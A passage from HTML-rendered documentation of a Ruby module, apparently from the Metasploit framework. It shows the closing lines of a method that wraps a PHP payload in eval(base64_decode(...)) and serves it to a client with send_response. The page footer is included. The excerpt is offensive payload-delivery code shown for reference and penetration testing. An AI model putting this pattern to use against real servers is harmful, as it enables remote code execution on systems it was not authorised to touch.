<span class='id identifier rubyid_body'>body</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>&lt;?php eval(base64_decode(&#39;</span><span class='embexpr_beg'>#{</span><span class='const'><span class='object_link'><a href="../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_encode_base64'>encode_base64</span><span class='lparen'>(</span><span class='id identifier rubyid_body'>body</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;));?&gt;</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>none</span><span class='tstring_end'>&#39;</span></span>
<span class='id identifier rubyid_body'>body</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>&lt;?php </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_body'>body</span><span class='embexpr_end'>}</span><span class='tstring_content'> ?&gt;</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>end</span>
<span class='id identifier rubyid_send_response'>send_response</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='comma'>,</span> <span class='id identifier rubyid_body'>body</span><span class='comma'>,</span> <span class='id identifier rubyid_headers'>headers</span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
</div>
<div id="footer">
Generated on Fri May 8 17:02:37 2026 by
<a href="https://yardoc.org" title="Yay! A Ruby Documentation Tool" target="_parent">yard</a>
0.9.37 (ruby-3.1.5).
</div>
</div>
</body>
</html>
Reference in New Issue Copy Permalink